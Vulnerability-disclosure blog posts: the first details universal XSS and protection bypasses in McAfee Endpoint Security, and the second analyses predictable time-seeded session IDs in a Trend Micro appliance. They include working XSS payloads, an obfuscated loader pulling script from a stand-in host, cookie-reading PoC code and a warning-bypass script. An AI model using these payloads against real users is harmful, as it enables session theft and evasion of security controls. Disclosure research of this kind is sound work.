malerisch.net - Security research, divulgations and food for thought. Roberto Suggi Liverani<br />
<br />
<b>UXSS in McAfee Endpoint Security, www.mcafee.com and some extra goodies...</b> (2017-04-26)<br />
<br />
During the <a href="https://conference.hitb.org/hitbsecconf2017ams/sessions/trending-a-micro-line-how-we-found-over-100-rce-vulnerabilities-in-trend-micro-software/">HITB2017AMS talk</a> given in Amsterdam with <a href="https://www.twitter.com/steventseeley">@Steventseeley</a>, I promised that I would disclose vulnerabilities affecting a security vendor product other than Trend Micro.<br />
<br />
For those who have come to my blog for the first time and are looking at the "insecurities" of security vendors, you might also be interested in <a href="https://www.slideshare.net/robertosl81/i-got-99-trends-and-a-is-all-of-them">how we found 200+ remote code execution vulnerabilities in Trend Micro software</a>...<br />
<br />
But this blog post is dedicated to two McAfee products instead: McAfee Endpoint Security and SiteAdvisor Enterprise (now part of McAfee Endpoint Security). For simplicity, I will just refer to McAfee Endpoint Security for the rest of this post.<br />
<br />
First let's demonstrate a particular type of XSS, a UXSS, so called because it only depends on the McAfee Endpoint Security plugin and not on a particular web site or web application.<br />
<br />
There are two different injection points:<br />
<br />
-<span class="Apple-tab-span" style="white-space: pre;"> </span>UXSS when a user visits a red labelled web site - the payload is rendered in BlockPage.html<br />
-<span class="Apple-tab-span" style="white-space: pre;"> </span>UXSS when a user is prompted with a Zero Day Protection warning page - the payload is rendered in WarnPromptPage.html<br />
<br />
<b>1)<span class="Apple-tab-span" style="white-space: pre;"> </span>UXSS – Block page</b><br />
<div>
<div>
<br /></div>
<div>
When a red labelled site is requested by a browser, McAfee Endpoint Security presents a block page to the user, as shown below:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTrmXQgj6d-lqNdf-I2EBeUE0lh7NJjg6CTFutM6pF6Wu7lpLaPRDg_NDeR9-zMoqwf6YhPzeW60eGyhjibEF_j0xtr3LB1zbq5xT-3ijN2N_CiL_aZ_-5N88hSTiLUth2iYNeMM8vM6o/s1600/s1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="436" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTrmXQgj6d-lqNdf-I2EBeUE0lh7NJjg6CTFutM6pF6Wu7lpLaPRDg_NDeR9-zMoqwf6YhPzeW60eGyhjibEF_j0xtr3LB1zbq5xT-3ijN2N_CiL_aZ_-5N88hSTiLUth2iYNeMM8vM6o/s640/s1.png" width="640" /></a></div>
<div>
</div>
<div>
If the user clicks on, or is forcibly redirected to, a URL of a domain labelled as "red", and an XSS payload is appended to the URL as in:<br />
<br />
http://red.cms.test-center.org/?id=xsspayloadhere<br />
<br />
then the XSS payload is rendered within the sacore:BlockPage.html page, as shown below:</div>
<div>
<br /></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLJ4qsSP7ATy4dmiJr6NkGUZZ6SEueXF6qS8uJKQ4pam2TU0-aOuGVy1CZwMSgEc1DeCa2U5rZzpJrjj37E5J9UulqqJiz3wqfuY09UL-Dd82Pau-_Jx7R-uBVV_dFBtwUWEV1rEAWd48/s1600/s2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="408" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLJ4qsSP7ATy4dmiJr6NkGUZZ6SEueXF6qS8uJKQ4pam2TU0-aOuGVy1CZwMSgEc1DeCa2U5rZzpJrjj37E5J9UulqqJiz3wqfuY09UL-Dd82Pau-_Jx7R-uBVV_dFBtwUWEV1rEAWd48/s640/s2.png" width="640" /></a></div>
</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<div>
<b>http://red.test.csm-testcenter.org/?id=<img src=a onerror=alert(document.location)></b></div>
<div>
<br /></div>
The user is automatically redirected to the sacore:BlockPage.html page.<br />
<br />
The universality of this type of XSS comes from the fact that any domain (red or unknown) can be used with an arbitrary XSS payload, and the site itself does not need to be vulnerable to XSS. The vulnerability affects an internal component of the sacore: zone, and therefore the native IE XSS Filter does not trigger, since that zone is considered more secure than the "Internet" zone.</div>
</div>
<div>
<br /></div>
<div>
<div>
2)<span class="Apple-tab-span" style="white-space: pre;"> </span><b>UXSS – Warning page</b></div>
<div>
<br /></div>
<div>
McAfee Endpoint Security provides a warning message when a user requests a web page from an unknown domain or a domain which has not been “analysed” by McAfee yet. This occurs when, in ePO (ePolicy Orchestrator), the Zero Day policy is set to “Warn” mode.</div>
<div>
<br /></div>
<div>
This warning page prompts the user to make a choice, whether to continue browsing to the site or cancel the navigation.</div>
<div>
<br /></div>
<div>
The standard screen shot can be seen below:</div>
</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYZVq9-n24zqoQUrvKOgt0zg7gevVwT3LK9rInKb1uytSMwLUcshl-cxK6Ryvi-2QIP7NNycQSQM5PLDgIuwQosaKHNnGrboPBWzlYL4oR4YLNpR4Z-GSK2Oc-qw4_uSvl-UoEJInEmCU/s1600/s3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="292" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYZVq9-n24zqoQUrvKOgt0zg7gevVwT3LK9rInKb1uytSMwLUcshl-cxK6Ryvi-2QIP7NNycQSQM5PLDgIuwQosaKHNnGrboPBWzlYL4oR4YLNpR4Z-GSK2Oc-qw4_uSvl-UoEJInEmCU/s640/s3.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
As in the previous case, a URL such as the one below leads to UXSS in the WarnPromptPage.html page:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
http://mkasdhsa87283721ijikshdaisohdsauiyd.com/?q=<img src=a onerror=alert(document.location)></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Also in this case, the user is automatically redirected to the Zero Day Protection warning page:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxios9WWmvag4YWfdRFp2Ibcm0mXKUHf3lL2q3O84RM9fAE4hQ0VGsmVwrTkqyfc-x8TdVxbAgmlh3H7ze-uZGc4SG72mTDpd4faEqHAC_E_LqgpD2-zasz9lB61YvR9AtFTemS8dq-Zw/s1600/s4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="377" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxios9WWmvag4YWfdRFp2Ibcm0mXKUHf3lL2q3O84RM9fAE4hQ0VGsmVwrTkqyfc-x8TdVxbAgmlh3H7ze-uZGc4SG72mTDpd4faEqHAC_E_LqgpD2-zasz9lB61YvR9AtFTemS8dq-Zw/s640/s4.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div>
Some readers might argue that only certain sites fall under the "block" or "warn" category, and therefore this might not be considered a "full" UXSS. However, the attacker chooses the URL, and if a blocked or warned site is chosen, the injection will <u>always</u> occur in the sacore: zone.<br />
<br />
And now, let's dive into the part where we can reach an XSS condition on the <u><b>www.mcafee.com</b></u> web site by chaining a further behaviour of the extension, without bypassing the Same Origin Policy (SOP)!</div>
<div>
<div>
<b><br /></b></div>
<div>
<b>UXSS in www.mcafee.com case</b></div>
<div>
<br /></div>
<div>
The web site serves a page named BlockPageGC.html at the following URL: <a href="http://www.mcafee.com/SAE/BlockPageGC.html">http://www.mcafee.com/SAE/BlockPageGC.html</a></div>
<div>
<br /></div>
<div>
This page is typically requested by McAfee Endpoint Security with a valid ID entry:</div>
<div>
<br /></div>
<div>
Example: http://<b><u>www.mcafee.com</u></b>/SAE/<b><u>BlockPageGC.html</u></b>?id=<b><u>validID:here</u></b></div>
<div>
<br /></div>
<div>
The page contains the following source code: </div>
</div>
<div>
<br /></div>
<div>
<div>
<i><html xmlns="http://www.w3.org/1999/xhtml"></i></div>
<div>
<i><!-----------------------------------------------------------------------------</i></div>
<div>
<i>* blockpage.html </i></div>
<div>
<i>* Copyright 2007, McAfee Inc. All Rights Reserved. </i></div>
<div>
<i>* kiykiogt</i></div>
<div>
<i> ------------------------------------------------------------------------------></i></div>
<div>
<i>[SNIP]</i></div>
<div>
<i> <td align="center"></i></div>
<div>
<i> <div id="header"></i></div>
<div>
<i> <div id="logoImage" style="display:none">x</div> </i></div>
<div>
<i> </div></i></div>
<div>
<i> <div class="vspacing1"></div></i></div>
<div>
<i> <div id="main" style="display:none;"></i></div>
<div>
<i> <div id="actionText"></div></i></div>
<div>
<i> <div id="saDomainText" style="margin-bottom:14px;"></div></i></div>
<div>
<i> <div id="actionDetailText" style="margin-bottom:14px;"></div></i></div>
<div>
<i> <div id="actionDetailAltText" style="margin-bottom:14px;"></div></i></div>
<div>
<i> <div id="dssContentText"></div></i></div>
<div>
<i> <div id="dssSecurityText"></div></i></div>
<div>
<i> <table style="padding-top:14px;text-align:center;" border="0" cellpadding="0" cellspacing="0" width="100%"></i></div>
<div>
<i> <tr></i></div>
<div>
<i> <td align="center"></i></div>
<div>
<i>[SNIP]</i></div>
</div>
<div>
<br /></div>
<div>
<div>
When the McAfee Endpoint Security extension parses the <div> element with ID “saDomainText”, it fetches the entry for that ID from the internal SAEVisits.dat SQLite database and populates the <div> element content with it.<br />
<br />
If the ID matches a stored XSS payload entry in the database, inserted by a malicious user as described above, then it is possible to render the XSS payload within the <b><u>www.mcafee.com</u></b> web site as well.</div>
<div>
<br /></div>
<div>
In the screen shot below, the injection can be seen in the DOM of the page on the <u><b>www.mcafee.com</b></u> web site. The injection is within the <div> element with id “saDomainText”:</div>
</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPVgLvpCLgmYvERPu8MmC5i-MQeAHR1Q4OjfKPvNYJYdmVeLBf0qe7xSHFwlWcRz5zCjfNZ7wju1I4grUijT_3l0B-ZG54_KsZmXEH69cTZx0bMqSUJoyCe0NTylPwH8Gf8EXgERtpIz8/s1600/s5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="627" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPVgLvpCLgmYvERPu8MmC5i-MQeAHR1Q4OjfKPvNYJYdmVeLBf0qe7xSHFwlWcRz5zCjfNZ7wju1I4grUijT_3l0B-ZG54_KsZmXEH69cTZx0bMqSUJoyCe0NTylPwH8Gf8EXgERtpIz8/s640/s5.png" width="640" /></a></div>
<div>
<div>
<br /></div>
<div>
This attack can be reproduced as follows:</div>
<div>
<br /></div>
<div>
The target user is redirected to a link such as:</div>
</div>
<div>
<br /></div>
<div>
<a href="http://yellow.test.csm-testcenter.org/?q3=%3Cimg%20src=b%20onerror=%27a=document.createElement(String.fromCharCode(115,99,114,105,112,116));a.setAttribute(String.fromCharCode(115,114,99),String.fromCharCode(104,%20116,%20116,%20112,%20115,%2058,%2047,%2047,%20119,%20104,%2097,%20116,%20101,%20118,%20101,%20114,%20115,%20105,%20116,%20101,%2047,%20106,%2046,%20106,%20115));document.body.appendChild(a)%27%3E">http://yellow.test.csm-testcenter.org/?q3=<img src=b onerror='a=document.createElement(String.fromCharCode(115,99,114,105,112,116));a.setAttribute(String.fromCharCode(115,114,99),String.fromCharCode(104,116,116,112,115,58,47,47,119, 104,97,116,101,118,101,114,115,105,116,101,47,106, 46,106,115));document.body.appendChild(a)'></a><br />
<br />
Which, simplified, is:<br />
<br />
<i><img src=b onerror='a=document.createElement("script");a.setAttribute("src","https://whateversite/j.js");document.body.appendChild(a)'></i><br />
<br />
This is a mandatory step, since a database entry storing the XSS payload needs to be created within SAEVisits.dat first. Once the entry is stored, the XSS logic can follow. In this case, the malicious site hosts a j.js file (as an example). An example j.js file is below:</div>
<div>
<br /></div>
<div>
<pre>
function blockGC() {
    // Stage 1: running inside the sacore: WarnPromptPage.html (the UXSS above)
    if (window.location.pathname == "WarnPromptPage.html") {
        alert("[+] Injecting into: " + window.location);
        alert("[+] Dumping body.innerHTML: " + document.body.innerHTML);
        // redirect to the public McAfee page with the ID stored in SAEVisits.dat
        window.location = "http://www.mcafee.com/SAE/BlockPageGC.html?id=" + window.location.href.substr(30, 23);
    }
    // Stage 2: now running on www.mcafee.com, where the stored entry is rendered
    if (window.location.hostname == "www.mcafee.com") {
        alert("[+] Successful redirection, now injecting into: " + window.location + document.cookie);
    }
}

blockGC();
</pre>
</div>
<div>
<br /></div>
<div>
<div>
The payload is a PoC (proof of concept) which first shows the injection within WarnPromptPage.html and then redirects to the www.mcafee.com/SAE/BlockPageGC.html page with a valid ID.</div>
<div>
<br /></div>
<div>
Then, the XSS is rendered within the www.mcafee.com web site. A video shows the full PoC in action:</div>
</div>
<div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i9.ytimg.com/vi/cwMxVx5S3KA/default.jpg?sqp=CNSX_ccF&rs=AOn4CLDxPxHi9qg42jXCJy9Q44UfIdguXQ" frameborder="0" height="266" src="https://www.youtube.com/embed/cwMxVx5S3KA?feature=player_embedded" width="320"></iframe></div>
<br />
<br />
<h2>
<a href="https://youtu.be/cwMxVx5S3KA">Video Link</a></h2>
But the UXSS can be used in many other ways - for instance, in the warning page case, it is possible to automatically "Continue" to the "potentially" malicious site without letting the target user make the choice, hence bypassing the "prevention" control of McAfee Endpoint Security.<br />
<br />
The following XSS payload is enough to bypass/skip the warning:<br />
<br />
<pre>
function bypasswarn() {
    // only act when running inside the sacore: warning page
    if (window.location.pathname == "warnpromptpage.html") {
        // submit the "Continue" form on the user's behalf
        document.forms[1].submit();
    }
}
</pre>
<br />
<br />
<b>What about also bypassing "block" pages?</b></div>
<div>
<br /></div>
<div>
<div>
Technically speaking, there is no bypass, because the IE browser fetches the web page anyway before McAfee Endpoint Security shows a warning or a block page. The warning/block page is displayed to the user after a redirection into the sacore: zone (as we saw in the examples above). Since the redirection occurs very quickly, a normal user would not realise what is happening and gets the impression that McAfee is triggering the protection "before" the site is viewed.<br />
<br />
However, as a proof of concept, it is possible to prevent the redirection to the block or warning pages (served within the sacore:// zone). This can be achieved by different means, such as a JavaScript snippet that delays the redirection through a popup. By doing this, after a certain amount of time, the McAfee Endpoint Security warn/block page is no longer loaded (at least in Internet Explorer 11).</div>
<div>
<br /></div>
<div>
Therefore, it is possible to fully navigate to a red (blocked) or warned site without triggering the Endpoint protection, which also enables other scenarios, such as corporate users browsing sites forbidden by policy.</div>
<div>
<br /></div>
<div>
In the example below, a red labelled site opens a popup window via alert() when the page is loaded, preventing the browser from being redirected to the sacore:// McAfee Endpoint Security page:</div>
</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHbq_GV8xqcrGdAr5sHm9otuB6GP3hXav3Rdsc_v0spEo5sBt6I3RazpAIQtdi8Bf_enWDNsNekFGlheSp1gqUxVV-PwzkUm1zofvQOD0-S4ZPddx36BLqK1x7h2Ceif9cmRGu5pj-Cw8/s1600/s6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="412" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHbq_GV8xqcrGdAr5sHm9otuB6GP3hXav3Rdsc_v0spEo5sBt6I3RazpAIQtdi8Bf_enWDNsNekFGlheSp1gqUxVV-PwzkUm1zofvQOD0-S4ZPddx36BLqK1x7h2Ceif9cmRGu5pj-Cw8/s640/s6.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkwYo1ULHysqmhANS3W1UWzkxk2nsgOHGnhepBNPECtQBiQnifumvaxFeJhrFg87wNDz46tr6AhXCA2II8Vm_HIB-59WvjR4ZLSqgQPWv3WJo8S8IPHlviqlVhohpjVz-tX25W1tuQ4WM/s1600/s7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="128" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkwYo1ULHysqmhANS3W1UWzkxk2nsgOHGnhepBNPECtQBiQnifumvaxFeJhrFg87wNDz46tr6AhXCA2II8Vm_HIB-59WvjR4ZLSqgQPWv3WJo8S8IPHlviqlVhohpjVz-tX25W1tuQ4WM/s640/s7.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
The same attack has been carried out against the Warning page, as shown below:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjogqFblTvd0a82zNY_zwxv4W8hJrPof2M1atTKNersyjYg1SJ_iw9sY0h4MF3zJFu-6Px8Yt7E4Pu8hsCeRTfP1993-8EXjTxduuSZLJTN_-5jHAPi20z0nXXfsF3YHIHJP55W3DjiQOs/s1600/s8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="424" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjogqFblTvd0a82zNY_zwxv4W8hJrPof2M1atTKNersyjYg1SJ_iw9sY0h4MF3zJFu-6Px8Yt7E4Pu8hsCeRTfP1993-8EXjTxduuSZLJTN_-5jHAPi20z0nXXfsF3YHIHJP55W3DjiQOs/s640/s8.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikDFyKZBfb0m_XeZaYETFrund1-apbveMCaJQuB1c-hzSIddQWG59GgOfkVDODjDWIMT4QqcWwxoDi7TjA_LWTJqtBj8xWM_y_FoDK8u0XAX7SkFNbR-kuh_9-YR5SbDdoB82S_FNtqrc/s1600/s9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="100" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikDFyKZBfb0m_XeZaYETFrund1-apbveMCaJQuB1c-hzSIddQWG59GgOfkVDODjDWIMT4QqcWwxoDi7TjA_LWTJqtBj8xWM_y_FoDK8u0XAX7SkFNbR-kuh_9-YR5SbDdoB82S_FNtqrc/s640/s9.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
By using this or similar technique, an attacker can serve a browser-based exploit and bypass McAfee Endpoint Security protection for both blocked sites and “zero-day” warning sites.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
But we are not finished yet... you would assume that some kind of DNS checking and resolution is performed? </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
From the behaviour we saw before, the answer is no: the web page is loaded by the browser first, so DNS resolution has already occurred.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
McAfee Endpoint Security only performs a string comparison on the host name (used to provide extra features such as search engine result protection); no DNS resolution or correlation is performed.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both;">
In a situation where the user's DNS is compromised, or the connection is not secure and a MitM attack is under way, it would be possible to fully bypass the protection offered by Endpoint Security.</div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
In the case below, the user's DNS has been compromised and www.google.com resolves to a server controlled by a malicious user. Even though the request is performed over HTTP, McAfee does not check the authenticity of the site/domain.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmJAd6P7xlxHYkBs7Rb9dVh6fs3doVDHKAjWpneLYJD_ca7bYz07Vr4StVN0WV53kSyiCJLriKqyT7ipv05XXzcxRPsdNnUixya5Yc-EaR4gUU5iix6v1CloZtZtrcg8GSZGgx5jdySFo/s1600/s10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="470" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmJAd6P7xlxHYkBs7Rb9dVh6fs3doVDHKAjWpneLYJD_ca7bYz07Vr4StVN0WV53kSyiCJLriKqyT7ipv05XXzcxRPsdNnUixya5Yc-EaR4gUU5iix6v1CloZtZtrcg8GSZGgx5jdySFo/s640/s10.png" width="640" /></a></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div>
Last but not least, McAfee Endpoint Security adds a “bullet” icon to categorise sites in search engine results. In a MitM context, it is possible to bypass this check by changing the HREF value in response to DOM events, such as onmouseover, as can be seen below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxhFEywA8yyd07iyo87-IRJmFQY-pIjkKg0oEDmWtSGtoFapBq1_KqVK9vvSJl60tSxldVNBm6aoiRiFA6s_rtxj_vxawQ9oRwgxKJzKLhzPpsEPNC-gWVFn8JEq3RrRPJZTy49BsNjpc/s1600/s11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxhFEywA8yyd07iyo87-IRJmFQY-pIjkKg0oEDmWtSGtoFapBq1_KqVK9vvSJl60tSxldVNBm6aoiRiFA6s_rtxj_vxawQ9oRwgxKJzKLhzPpsEPNC-gWVFn8JEq3RrRPJZTy49BsNjpc/s640/s11.png" width="500" /></a></div>
<br />
<br />
Source code:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkLGvQVmxyIxmIZBc1ghqu_sCQZbyr-qTlcicu9mNpLL44aMPJ_iAxv4Ph_EBAANitKtAbWnZjAkSQR9JTyxCcC71QRq88dwQbP_8Urk1R9yZ9H54snOwEka8zk5mEHPeRWlppBo0oBio/s1600/s12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="66" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkLGvQVmxyIxmIZBc1ghqu_sCQZbyr-qTlcicu9mNpLL44aMPJ_iAxv4Ph_EBAANitKtAbWnZjAkSQR9JTyxCcC71QRq88dwQbP_8Urk1R9yZ9H54snOwEka8zk5mEHPeRWlppBo0oBio/s640/s12.png" width="640" /></a></div>
<br />
Since the “wikipedia” site (https://en.wikipedia.org/) is a whitelisted address, the McAfee Secure bullet is added; however, McAfee has no check to detect whether the HREF value has been changed dynamically when the onmouseover event is triggered, so the user can be lured into clicking a "trusted" site.<br />
<br />
After reporting all these issues to McAfee, McAfee produced a single CVE for the UXSS, as outlined <a href="https://kc.mcafee.com/corporate/index?page=content&id=SB10180">here</a>.<br />
<br />
The vulnerable versions, which should now be patched, are: Endpoint Security 10.2 and SiteAdvisor Enterprise 3.5. These vulnerabilities were only confirmed when using IE11 (Edge mode) (IE 11.0.9600.18499).<br />
<br />
The issues do not trigger when using Firefox or Chrome for example, on the same versions of McAfee Endpoint Security or SiteAdvisor Enterprise.<br />
<br />
Interestingly enough, recently, there was a similar XSS condition in a different McAfee product which resulted in a similar impact:<br />
<br />
<a href="https://blog.cybermtl.org/near-universal-xss-in-mcafee-web-gateway-cf8dfcbc8fc3">https://blog.cybermtl.org/near-universal-xss-in-mcafee-web-gateway-cf8dfcbc8fc3</a><br />
<br />
So I think I kept the promise I made during HITB2017AMS!<br />
<br />
For those of you who have read this far, thanks!<br />
<br />
If you like my work/research, please follow me on Twitter - <a href="https://www.twitter.com/malerisch">@malerisch</a><br />
<br />
<b>References:</b><br />
<br />
Subverting Ajax: <a href="https://events.ccc.de/congress/2006/Fahrplan/attachments/1158-Subverting_Ajax.pdf">https://events.ccc.de/congress/2006/Fahrplan/attachments/1158-Subverting_Ajax.pdf</a><br />
<br />
<br />
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<b>Trend Micro Threat Discovery Appliance - Session Generation Authentication Bypass (CVE-2016-8584)</b> (Roberto Suggi Liverani, 2017-04-20)<br />
<br />
In the last few months, I have been testing several Trend Micro products with Steven Seeley (<a href="https://twitter.com/steventseeley">@steventseeley</a>). Together, we have found more than 200 RCE (Remote Code Execution) vulnerabilities and for the first time we presented the outcome of our research at <a href="https://conference.hitb.org/hitbsecconf2017ams/sessions/trending-a-micro-line-how-we-found-over-100-rce-vulnerabilities-in-trend-micro-software/">Hack In The Box 2017 Amsterdam</a> in April.<br />
<br />
The presentation is available as a <a href="http://conference.hitb.org/hitbsecconf2017ams/materials/D1T1%20-%20Steven%20Seeley%20and%20Roberto%20Suggi%20Liverani%20-%20I%20Got%2099%20Trends%20and%20a%20%23%20Is%20All%20Of%20Them.pdf">PDF</a> or as a <a href="https://www.slideshare.net/robertosl81/i-got-99-trends-and-a-is-all-of-them">Slideshare</a>.<br />
<br />
<iframe allowfullscreen="" frameborder="0" height="470px" marginheight="0" marginwidth="0" mozallowfullscreen="" scrolling="no" src="https://www.slideshare.net/robertosl81/slideshelf" style="border: none;" webkitallowfullscreen="" width="615px"></iframe>
<br />
Since it was not possible to cover all the discovered vulnerabilities in a single presentation, this blog post covers and analyses a further vulnerability that did not make it into the slides, and which affects the Trend Micro Threat Discovery Appliance (TDA) product.<br />
<br />
<b>CVE-2016-8584 - TDA Session Generation Authentication Bypass</b><br />
<br />
This was an interesting vulnerability, discovered after observing that two consecutive login attempts against the web interface returned the same session_id token. From this observation, our inference was that a time factor played a role. After further analysis and reversing of the TDA libraries, the session management was found to be defined in the following library: /opt/TrendMicro/MinorityReport/lib/mini_httpd/utils.so<br />
<div>
<br /></div>
<div>
Within this library, the create_session() function is of particular interest, as shown below.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgXqASmgcOuD0WbIpO1bAWXrk5mrB39QPUHqP3AMMmdJ9vQjuB3YjrKLgQgDw4ycTKBr_w_lcXp3gjD2H3YR5GSykkRvjdL-AYtHDWNIL5_32jUy4YeSg90IFo42w1sGM_8bE8nzUFeHg/s1600/create_session.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgXqASmgcOuD0WbIpO1bAWXrk5mrB39QPUHqP3AMMmdJ9vQjuB3YjrKLgQgDw4ycTKBr_w_lcXp3gjD2H3YR5GSykkRvjdL-AYtHDWNIL5_32jUy4YeSg90IFo42w1sGM_8bE8nzUFeHg/s400/create_session.png" width="338" /></a></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj50474hOY1gL4aogLiGVXy492h7HY4aJO7kv5TSwhPvdIadOaXCsfpVNK772WWaQxzW_UAk9fNLZ2U2943aYA2XDCQrr76TKCWq0UkiOwMo11wf2kEz73YwZ6UnBKTk3dIpj9vTIYfCOU/s1600/create_session2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="382" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj50474hOY1gL4aogLiGVXy492h7HY4aJO7kv5TSwhPvdIadOaXCsfpVNK772WWaQxzW_UAk9fNLZ2U2943aYA2XDCQrr76TKCWq0UkiOwMo11wf2kEz73YwZ6UnBKTk3dIpj9vTIYfCOU/s400/create_session2.png" width="400" /></a></div>
<br />
This function performs the following actions:<br />
<br />
- Gets the current time<br />
- Uses that time as the “seed”<br />
- Calls srand() with the above seed<br />
- MD5-hashes the rest<br />
<br />
All these steps can be summarised as: <i>session_id = md5(srand(get_curtime()))</i><br />
<br />
The vulnerability is that the seed is predictable, and therefore an attacker can generate session IDs issued in the past.<br />
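To make the weakness concrete, here is an added C example (not Trend Micro's code) that models the create_session() steps above next to a CSPRNG-backed replacement and an audit check a defender can run against a captured token. As an assumption for brevity, the MD5 step is replaced by hex-encoding the rand() output directly, which does not change the predictability argument.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

#define SESSION_ID_LEN 32  /* 32 hex characters, the width of an MD5 digest */

/*
 * Weak generator, modelled on the create_session() steps above: the clock
 * (1-second granularity) is the only entropy, so every token is a pure
 * function of the second in which the login was processed. The real library
 * hashes with MD5; hex-encoding rand() directly is an assumption made here
 * for brevity and does not change the predictability argument.
 */
void weak_session_id(time_t login_time, char out[SESSION_ID_LEN + 1])
{
    srand((unsigned int)login_time);          /* seed = current time */
    for (int i = 0; i < SESSION_ID_LEN / 8; i++) {
        /* each rand() call yields at most 31 bits: 8 hex digits, zero padded */
        snprintf(out + i * 8, 9, "%08x", (unsigned int)rand());
    }
}

/*
 * Audit check: does an observed token equal what the weak generator produces
 * for a given second? Run against a captured login response and the time it
 * was issued, a match confirms the session id carries no real randomness.
 * Returns 1 on match, 0 otherwise.
 */
int reproduces_weak_token(const char *token, time_t login_time)
{
    char candidate[SESSION_ID_LEN + 1];
    weak_session_id(login_time, candidate);
    return strcmp(candidate, token) == 0;
}

/*
 * Hardened replacement: 128 bits read from the OS CSPRNG (/dev/urandom),
 * hex encoded. Two logins in the same second now get unrelated tokens.
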